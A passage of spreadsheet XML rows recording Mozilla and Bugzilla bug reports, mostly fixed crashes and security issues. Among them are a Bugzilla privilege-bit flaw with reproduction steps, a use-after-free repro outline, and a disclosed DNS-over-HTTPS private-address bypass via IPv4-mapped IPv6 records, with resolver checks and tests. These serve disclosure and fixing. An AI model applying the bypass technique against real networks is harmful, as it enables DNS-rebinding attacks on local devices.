        </is>
      </c>
      <c r="K133" t="inlineStr">
        <is>
          <t>2.16.3</t>
        </is>
      </c>
      <c r="L133" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M133" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N133" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O133" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P133" t="inlineStr">
        <is>
          <t>[fixed in 2.16.4] [does not affect trunk]</t>
        </is>
      </c>
      <c r="Q133" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R133" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S133" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T133" t="n">
        <v>1</v>
      </c>
      <c r="U133" t="n">
        <v>0</v>
      </c>
      <c r="V133" t="n">
        <v>13</v>
      </c>
      <c r="W133" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; de-AT; rv:1.5) Gecko/20030916
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; de-AT; rv:1.5) Gecko/20030916
When deleting a product, in editproducts.cgi action 'delete' the groupbit is set
to 0 for all members(profiles.groupset). The blessgroupset field is not updated.
When creating a new Product it gets this 'old' bitnumber and my users have can
turn membership bits on fo this product. That's not what I expected.
Reproducible: Always
Steps to Reproduce:
1. Create new Product A
2. Give user the right to turn bit on for other users
3. Delete Product A
4. Create new Product B
(usebuggroups has to be enabled)
Actual Results:  
Now this user can turn bit on for other users (Product B)
Expected Results:  
The blessgroupset should also be updated. Nobody except superusers can turn this
bit on.
Using Bugzilla 2.16.3</t>
        </is>
      </c>
      <c r="X133" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="134">
      <c r="A134" t="n">
        <v>583337</v>
      </c>
      <c r="B134" t="inlineStr">
        <is>
          <t>2010-07-30 13:43:59 -0700</t>
        </is>
      </c>
      <c r="C134" t="inlineStr">
        <is>
          <t>Firefox detects, won't work with, server doing SSL DHE cipher suites with tiny keys</t>
        </is>
      </c>
      <c r="D134" t="inlineStr">
        <is>
          <t>2022-03-05 09:30:28 -0800</t>
        </is>
      </c>
      <c r="E134" t="n">
        <v>1</v>
      </c>
      <c r="F134" t="n">
        <v>1</v>
      </c>
      <c r="G134" t="n">
        <v>3</v>
      </c>
      <c r="H134" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I134" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J134" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K134" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L134" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M134" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N134" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O134" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P134" t="inlineStr"/>
      <c r="Q134" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R134" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S134" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T134" t="n">
        <v>1</v>
      </c>
      <c r="U134" t="n">
        <v>1</v>
      </c>
      <c r="V134" t="n">
        <v>70</v>
      </c>
      <c r="W134" t="inlineStr">
        <is>
          <t>http://www.enbridge.com/mypage
The above link caused a malformed SSL handshake in both Minefield nightly and Beta 2.  The page loaded properly in Beta 1 and 3.6.8</t>
        </is>
      </c>
      <c r="X134" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" t="n">
        <v>854582</v>
      </c>
      <c r="B135" t="inlineStr">
        <is>
          <t>2013-03-25 15:01:21 -0700</t>
        </is>
      </c>
      <c r="C135" t="inlineStr">
        <is>
          <t>Check why marketplace pages in the payment flow are not showing localized strings</t>
        </is>
      </c>
      <c r="D135" t="inlineStr">
        <is>
          <t>2013-04-03 14:13:50 -0700</t>
        </is>
      </c>
      <c r="E135" t="n">
        <v>1</v>
      </c>
      <c r="F135" t="n">
        <v>1</v>
      </c>
      <c r="G135" t="n">
        <v>6</v>
      </c>
      <c r="H135" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I135" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J135" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K135" t="inlineStr">
        <is>
          <t>1.2</t>
        </is>
      </c>
      <c r="L135" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M135" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N135" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O135" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P135" t="inlineStr">
        <is>
          <t>p=2</t>
        </is>
      </c>
      <c r="Q135" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R135" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S135" t="inlineStr">
        <is>
          <t>2013-03-28</t>
        </is>
      </c>
      <c r="T135" t="n">
        <v>1</v>
      </c>
      <c r="U135" t="n">
        <v>0</v>
      </c>
      <c r="V135" t="n">
        <v>3</v>
      </c>
      <c r="W135" t="inlineStr">
        <is>
          <t>steps to reproduce:
1. On your phone, change Language to Spanish
2. Launch marketplace-dev app.
3. Notice that the homepage shows localized strings.
4. Start the purchase flow for a paid app
5. Sign in with Identity
6. Notice the Enter PIN screen
expected behavior:
All strings in the "Enter PIN" screen are localized
observed behavior:
All the strings in that screen are in English
Note: Bango and trusted UI serve localized content/copy as expected.</t>
        </is>
      </c>
      <c r="X135" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="136">
      <c r="A136" t="n">
        <v>787493</v>
      </c>
      <c r="B136" t="inlineStr">
        <is>
          <t>2012-08-31 11:05:47 -0700</t>
        </is>
      </c>
      <c r="C136" t="inlineStr">
        <is>
          <t>Crash with ASSERTION: insPos too small</t>
        </is>
      </c>
      <c r="D136" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:48 -0700</t>
        </is>
      </c>
      <c r="E136" t="n">
        <v>1</v>
      </c>
      <c r="F136" t="n">
        <v>1</v>
      </c>
      <c r="G136" t="n">
        <v>3</v>
      </c>
      <c r="H136" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I136" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J136" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K136" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L136" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M136" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N136" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O136" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P136" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q136" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R136" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S136" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T136" t="n">
        <v>1</v>
      </c>
      <c r="U136" t="n">
        <v>0</v>
      </c>
      <c r="V136" t="n">
        <v>27</v>
      </c>
      <c r="W136" t="inlineStr">
        <is>
          <t>Created attachment 657365
Repro-file
Reproducible with built from 
https://people.mozilla.com/~choller/firefox/asan/20120831-mozilla-central-linux64-debug-fcc533f691e9+asan.html
OS: Ubuntu 12.04 x86_64
The reprofile is not stable and it might take few tries to reproduce.
ASAN-report:
ASAN:SIGSEGV
==11689== ERROR: AddressSanitizer crashed on unknown address 0x7f00dca7af80 (pc 0x7efff2512520 sp 0x7fffdf81b7d8 bp 0x7fffdf81b820 T0)
AddressSanitizer can not provide additional info. ABORTING
    #0 0x7efff2512520 in ?? /build/buildd/eglibc-2.15/string/../sysdeps/x86_64/multiarch/memcpy-ssse3-back.S:2577
    #1 0x7effe7e9c1bf in nsTArray_base&lt;nsTArrayDefaultAllocator&gt;::ShiftData(unsigned int, unsigned int, unsigned int, unsigned int, unsigned long) /builds/slave/try-lnx64-dbg/build/../../../dist/include/nsTArray-inl.h:247
    #2 0x7effe8cb2b47 in nsRefPtr&lt;nsHTMLOptionElement&gt;* nsTArray&lt;nsRefPtr&lt;nsHTMLOptionElement&gt;, nsTArrayDefaultAllocator&gt;::ReplaceElementsAt&lt;nsHTMLOptionElement*&gt;(unsigned int, unsigned int, nsHTMLOptionElement* const*, unsigned int) /builds/slave/try-lnx64-dbg/build/../../../../dist/include/nsTArray.h:724
    #3 0x7effe8ca6367 in nsHTMLOptionCollection::InsertOptionAt(nsHTMLOptionElement*, unsigned int) /builds/slave/try-lnx64-dbg/build/content/html/content/src/nsHTMLSelectElement.h:68
    #4 0x7effe8ca5392 in nsHTMLSelectElement::InsertOptionsIntoListRecurse(nsIContent*, int*, int) /builds/slave/try-lnx64-dbg/build/content/html/content/src/nsHTMLSelectElement.cpp:338
    #5 0x7effe8ca4d8e in nsHTMLSelectElement::InsertOptionsIntoList(nsIContent*, int, int, bool) /builds/slave/try-lnx64-dbg/build/content/html/content/src/nsHTMLSelectElement.cpp:215
    #6 0x7effe8ca65fb in nsHTMLSelectElement::WillAddOptions(nsIContent*, nsIContent*, int, bool) /builds/slave/try-lnx64-dbg/build/content/html/content/src/nsHTMLSelectElement.cpp:455
    #7 0x7effe8ca3881 in nsSafeOptionListMutation /builds/slave/try-lnx64-dbg/build/content/html/content/src/nsHTMLSelectElement.cpp:73
    #8 0x7effe8ca4b51 in nsHTMLSelectElement::InsertChildAt(nsIContent*, unsigned int, bool) /builds/slave/try-lnx64-dbg/build/content/html/content/src/nsHTMLSelectElement.cpp:191
.
.
.</t>
        </is>
      </c>
      <c r="X136" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" t="n">
        <v>513394</v>
      </c>
      <c r="B137" t="inlineStr">
        <is>
          <t>2009-08-28 18:20:12 -0700</t>
        </is>
      </c>
      <c r="C137" t="inlineStr">
        <is>
          <t>"ASSERTION: Some PresArena objects were not freed" with -moz-column, list-item, float, :after</t>
        </is>
      </c>
      <c r="D137" t="inlineStr">
        <is>
          <t>2009-12-06 17:06:21 -0800</t>
        </is>
      </c>
      <c r="E137" t="n">
        <v>1</v>
      </c>
      <c r="F137" t="n">
        <v>1</v>
      </c>
      <c r="G137" t="n">
        <v>3</v>
      </c>
      <c r="H137" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I137" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J137" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K137" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L137" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M137" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N137" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O137" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P137" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q137" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R137" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S137" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T137" t="n">
        <v>1</v>
      </c>
      <c r="U137" t="n">
        <v>0</v>
      </c>
      <c r="V137" t="n">
        <v>22</v>
      </c>
      <c r="W137" t="inlineStr">
        <is>
          <t>Created attachment 397408
testcase (triggers the assertion but not the crash)
###!!! ASSERTION: Some PresArena objects were not freed: 'mAllocCount == 0', file /Users/jruderman/central/layout/base/nsPresArena.cpp, line 169
Appears to be exploitable.</t>
        </is>
      </c>
      <c r="X137" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="138">
      <c r="A138" t="n">
        <v>238610</v>
      </c>
      <c r="B138" t="inlineStr">
        <is>
          <t>2004-03-25 02:52:17 -0800</t>
        </is>
      </c>
      <c r="C138" t="inlineStr">
        <is>
          <t>"my.conf" --&gt; "my.cnf" in Bugzilla docs 2.16 branch</t>
        </is>
      </c>
      <c r="D138" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:39 -0800</t>
        </is>
      </c>
      <c r="E138" t="n">
        <v>1</v>
      </c>
      <c r="F138" t="n">
        <v>1</v>
      </c>
      <c r="G138" t="n">
        <v>4</v>
      </c>
      <c r="H138" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I138" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J138" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K138" t="inlineStr">
        <is>
          <t>2.16.5</t>
        </is>
      </c>
      <c r="L138" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M138" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N138" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O138" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P138" t="inlineStr"/>
      <c r="Q138" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R138" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S138" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T138" t="n">
        <v>1</v>
      </c>
      <c r="U138" t="n">
        <v>0</v>
      </c>
      <c r="V138" t="n">
        <v>3</v>
      </c>
      <c r="W138" t="inlineStr">
        <is>
          <t>Make "my.conf" --&gt; "my.cnf" in Bugzilla docs 2.16 branch.</t>
        </is>
      </c>
      <c r="X138" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="139">
      <c r="A139" t="n">
        <v>1445471</v>
      </c>
      <c r="B139" t="inlineStr">
        <is>
          <t>2018-03-13 14:55:54 -0700</t>
        </is>
      </c>
      <c r="C139" t="inlineStr">
        <is>
          <t>Crash in mozilla::plugins::EndpointHandler&lt;T&gt;::Copy&lt;T&gt;</t>
        </is>
      </c>
      <c r="D139" t="inlineStr">
        <is>
          <t>2018-03-26 10:11:29 -0700</t>
        </is>
      </c>
      <c r="E139" t="n">
        <v>1</v>
      </c>
      <c r="F139" t="n">
        <v>1</v>
      </c>
      <c r="G139" t="n">
        <v>3</v>
      </c>
      <c r="H139" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I139" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J139" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K139" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L139" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M139" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N139" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O139" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P139" t="inlineStr"/>
      <c r="Q139" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R139" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S139" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T139" t="n">
        <v>1</v>
      </c>
      <c r="U139" t="n">
        <v>0</v>
      </c>
      <c r="V139" t="n">
        <v>10</v>
      </c>
      <c r="W139" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-c8717d95-f034-4ea4-a15e-a6b700180310.
=============================================================
Top 10 frames of crashing thread:
0 xul.dll mozilla::plugins::EndpointHandler&lt;0&gt;::Copy&lt;void*, unsigned __int64&gt; dom/plugins/ipc/FunctionBroker.h:663
1 xul.dll mozilla::plugins::Marshaler&lt;0, mozilla::plugins::RequestHandler&lt;17, int &gt; &gt;::MaybeUnmarshalParameter&lt;0, void*, 1, 0&gt;::UnmarshalParameter&lt;unsigned __int64&gt; dom/plugins/ipc/FunctionBroker.h:877
2 xul.dll mozilla::plugins::FunctionBroker&lt;7, int &gt;::BrokerCallServer dom/plugins/ipc/FunctionBroker.h:1400
3 xul.dll mozilla::plugins::FunctionBroker&lt;7, int &gt;::RunOriginalFunction dom/plugins/ipc/FunctionBroker.h:1252
4 xul.dll mozilla::plugins::FunctionBrokerParent::RecvBrokerFunction dom/plugins/ipc/FunctionBrokerParent.cpp:111
5 xul.dll mozilla::plugins::PFunctionBrokerParent::OnMessageReceived ipc/ipdl/PFunctionBrokerParent.cpp:137
6 xul.dll mozilla::ipc::MessageChannel::DispatchSyncMessage ipc/glue/MessageChannel.cpp:2078
7 xul.dll mozilla::ipc::MessageChannel::DispatchMessageW ipc/glue/MessageChannel.cpp:2036
8 xul.dll mozilla::ipc::MessageChannel::RunMessage ipc/glue/MessageChannel.cpp:1886
9 xul.dll mozilla::ipc::MessageChannel::MessageTask::Run ipc/glue/MessageChannel.cpp:1919
=============================================================
this browser crash signature is newly showing up in firefox 60 with MOZ_RELEASE_ASSERT(aDest) that got added in bug 1382251.</t>
        </is>
      </c>
      <c r="X139" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="140">
      <c r="A140" t="n">
        <v>1317409</v>
      </c>
      <c r="B140" t="inlineStr">
        <is>
          <t>2016-11-14 11:01:07 -0800</t>
        </is>
      </c>
      <c r="C140" t="inlineStr">
        <is>
          <t>UAF involving mutation events, contenteditable iframes and adding and immediately removing audio elements</t>
        </is>
      </c>
      <c r="D140" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E140" t="n">
        <v>1</v>
      </c>
      <c r="F140" t="n">
        <v>1</v>
      </c>
      <c r="G140" t="n">
        <v>3</v>
      </c>
      <c r="H140" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I140" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J140" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K140" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L140" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M140" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N140" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O140" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P140" t="inlineStr">
        <is>
          <t>[adv-main50.1+][adv-esr45.6+]</t>
        </is>
      </c>
      <c r="Q140" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R140" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S140" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T140" t="n">
        <v>1</v>
      </c>
      <c r="U140" t="n">
        <v>0</v>
      </c>
      <c r="V140" t="n">
        <v>30</v>
      </c>
      <c r="W140" t="inlineStr">
        <is>
          <t>Created attachment 8810488
09043C65.5F5B4F30.log-ff-uaf-49.0.2.html
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Build ID: 20161019084923
Steps to reproduce:
1. Run Firefox 
2. Attach debugger to plugin-container.exe 
3. Open reporo   (remotly eg. http://localhost/09043C65.5F5B4F30.log-ff-uaf-49.0.2.html) 
Actual results:
Firefox Crash (ESI = 0xe5e5e5e5)
Expected results:
Nothing</t>
        </is>
      </c>
      <c r="X140" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" t="n">
        <v>1672528</v>
      </c>
      <c r="B141" t="inlineStr">
        <is>
          <t>2020-10-21 15:59:17 -0700</t>
        </is>
      </c>
      <c r="C141" t="inlineStr">
        <is>
          <t>TRR (DoH) RFC1918 addresses protection bypass using IPv4-mapped address</t>
        </is>
      </c>
      <c r="D141" t="inlineStr">
        <is>
          <t>2024-05-30 10:20:11 -0700</t>
        </is>
      </c>
      <c r="E141" t="n">
        <v>1</v>
      </c>
      <c r="F141" t="n">
        <v>1</v>
      </c>
      <c r="G141" t="n">
        <v>3</v>
      </c>
      <c r="H141" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I141" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J141" t="inlineStr">
        <is>
          <t>Networking: DNS</t>
        </is>
      </c>
      <c r="K141" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L141" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M141" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N141" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O141" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P141" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][necko-triage][adv-main83+][adv-esr78.5+]</t>
        </is>
      </c>
      <c r="Q141" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R141" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S141" t="inlineStr">
        <is>
          <t>84 Branch</t>
        </is>
      </c>
      <c r="T141" t="n">
        <v>1</v>
      </c>
      <c r="U141" t="n">
        <v>0</v>
      </c>
      <c r="V141" t="n">
        <v>22</v>
      </c>
      <c r="W141" t="inlineStr">
        <is>
          <t>## Summary
When using Firefox with Trusted Recursive Resolver (TRR), private IP addresses are
rejected by default (`network.trr.allow-rfc1918=false`). This protection can prevent
browser-based attacks of machines located on the LAN such as DNS-rebinding attacks.
However, this protection can be bypassed by using a IPv4-mapped IPV6 address
(eg. ::ffff:192.168.1.254).
This has been tested with Firefox Nightly 84.0a1 (2020-10-21) (64 bits) on Debian testing.
## Example
Let's create some domain names records:
~~~
$ dig @1.1.1.1 +short A wat4.urdhr.fr
::ffff:192.168.1.254
$ dig @1.1.1.1 +short AAAA wat6.urdhr.fr
::ffff:192.168.1.254
~~~
Let's check the are actually resolved by the DoH resolver
we are using:
~~~python
import dns.query
import dns.message
resolver = "https://cloudflare-dns.com/dns-query"
dns.query.https(dns.message.make_query("wat4.urdhr.fr", "A"), resolver).answer
# =&gt; [&lt;DNS wat4.urdhr.fr. IN A RRset: [&lt;192.168.1.254&gt;]&gt;]
dns.query.https(dns.message.make_query("wat6.urdhr.fr", "AAAA"), resolver).answer
# =&gt; [&lt;DNS wat6.urdhr.fr. IN AAAA RRset: [&lt;::ffff:192.168.1.254&gt;]&gt;]
~~~
When using TRR and `network.trr.allow-rfc1918=false`,
* http://wat4.urdhr.fr is not reachable in TRR
  mode because the private IP address is rejected by Firefox;
* http://wat6.urdhr.fr however, is reachable
  (assuming a web server is running on this IP address and port).
As far as I understand, the process is as follow:
1. the name is resolved to IPv6 ffff:192.168.1.254;
2. this IPv6 address is not considered a private IP address by `NetAddr::IsIPAddrLocal()`;
3. this IPv6 address generates a `AF_INET6` address in `DOHresp::Add()`;
4. this `AF_INET6` is passed to kernel;
5. kernel connects to 192.168.1.256.
## Code snippets
NetAddr derivation from DNS bytes:
~~~cpp
nsresult DOHresp::Add(uint32_t TTL, unsigned char* dns, unsigned int index,
                      uint16_t len, bool aLocalAllowed) {
  NetAddr addr;
  if (4 == len) {
    // IPv4
    addr.inet.family = AF_INET;
    addr.inet.port = 0;  // unknown
    addr.inet.ip = ntohl(get32bit(dns, index));
  } else if (16 == len) {
    // IPv6
    addr.inet6.family = AF_INET6;
    addr.inet6.port = 0;      // unknown
    addr.inet6.flowinfo = 0;  // unknown
    addr.inet6.scope_id = 0;  // unknown
    for (int i = 0; i &lt; 16; i++, index++) {
      addr.inet6.ip.u8[i] = dns[index];
    }
  } else {
    return NS_ERROR_UNEXPECTED;
  }
  if (addr.IsIPAddrLocal() &amp;&amp; !aLocalAllowed) {
    return NS_ERROR_FAILURE;
  }
  // While the DNS packet might return individual TTLs for each address,
  // we can only return one value in the AddrInfo class so pick the
  // lowest number.
  if (mTtl &lt; TTL) {
    mTtl = TTL;
  }
  if (LOG_ENABLED()) {
    char buf[128];
    addr.ToStringBuffer(buf, sizeof(buf));
    LOG(("DOHresp:Add %s\n", buf));
  }
  mAddresses.AppendElement(addr);
  return NS_OK;
}
~~~
Checking if IP address is private:
~~~cpp
bool NetAddr::IsIPAddrLocal() const {
  const NetAddr* addr = this;
  // IPv4 RFC1918 and Link Local Addresses.
  if (addr-&gt;raw.family == AF_INET) {
    uint32_t addr32 = ntohl(addr-&gt;inet.ip);
    if (addr32 &gt;&gt; 24 == 0x0A ||    // 10/8 prefix (RFC 1918).
        addr32 &gt;&gt; 20 == 0xAC1 ||   // 172.16/12 prefix (RFC 1918).
        addr32 &gt;&gt; 16 == 0xC0A8 ||  // 192.168/16 prefix (RFC 1918).
        addr32 &gt;&gt; 16 == 0xA9FE) {  // 169.254/16 prefix (Link Local).
      return true;
    }
  }
  // IPv6 Unique and Link Local Addresses.
  if (addr-&gt;raw.family == AF_INET6) {
    uint16_t addr16 = ntohs(addr-&gt;inet6.ip.u16[0]);
    if (addr16 &gt;&gt; 9 == 0xfc &gt;&gt; 1 ||    // fc00::/7 Unique Local Address.
        addr16 &gt;&gt; 6 == 0xfe80 &gt;&gt; 6) {  // fe80::/10 Link Local Address.
      return true;
    }
  }
  // Not an IPv4/6 local address.
  return false;
}
~~~
## Tests
These tests should be able to check the expected behavior (in `test_trr.js`):
~~~cpp
// verify RFC1918 IPv4-mapped address from the server is rejected
add_task(async function test7() {
  dns.clearCache(true);
  Services.prefs.setIntPref("network.trr.mode", 3); // TRR-only
  Services.prefs.setCharPref(
    "network.trr.uri",
    `https://foo.example.com:${h2Port}/doh?responseIP=::ffff.192.168.0.1`
  );
  let [, , inStatus] = await new DNSListener(
    "rfc1918.example.com",
    undefined,
    false
  );
  Assert.ok(
    !Components.isSuccessCode(inStatus),
    `${inStatus} should be an error code`
  );
});
// verify RFC1918 IPv4-mapped address from the server is fine when told so
add_task(async function test8() {
  dns.clearCache(true);
  Services.prefs.setIntPref("network.trr.mode", 3); // TRR-only
  Services.prefs.setCharPref(
    "network.trr.uri",
    `https://foo.example.com:${h2Port}/doh?responseIP=::ffff.192.168.0.1`
  );
  Services.prefs.setBoolPref("network.trr.allow-rfc1918", true);
  await new DNSListener("rfc1918.example.com", "192.168.0.1");
});
~~~
## Additional Considerations
It would probably make sense to be able to reject the following networks
as well:
- 0.0.0.0/24
- 127.0.0.0/8
- ::1/128
These can be used for DNS-rebinding attacks on the local machine.</t>
        </is>
      </c>
      <c r="X141" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="142">
      <c r="A142" t="n">
        <v>1314912</v>
      </c>
      <c r="B142" t="inlineStr">
        <is>
          <t>2016-11-03 04:22:30 -0700</t>
        </is>
      </c>
      <c r="C142" t="inlineStr">
        <is>
          <t>history.pushState - Firefox Hangs and then iterating script error</t>
        </is>
      </c>
      <c r="D142" t="inlineStr">
        <is>
          <t>2024-11-13 13:16:00 -0800</t>
        </is>
      </c>
      <c r="E142" t="n">
        <v>1</v>
      </c>
      <c r="F142" t="n">
        <v>1</v>
      </c>
      <c r="G142" t="n">
        <v>3</v>
      </c>
      <c r="H142" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I142" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J142" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K142" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L142" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M142" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N142" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O142" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P142" t="inlineStr">
        <is>
          <t>[adv-main83+]</t>
        </is>
      </c>
      <c r="Q142" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R142" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S142" t="inlineStr">
        <is>
          <t>83 Branch</t>
        </is>
      </c>
      <c r="T142" t="n">
        <v>1</v>
      </c>
      <c r="U142" t="n">
        <v>1</v>
      </c>
      <c r="V142" t="n">
        <v>40</v>
      </c>
      <c r="W142" t="inlineStr">
        <is>
          <t>Created attachment 8807110
index.html
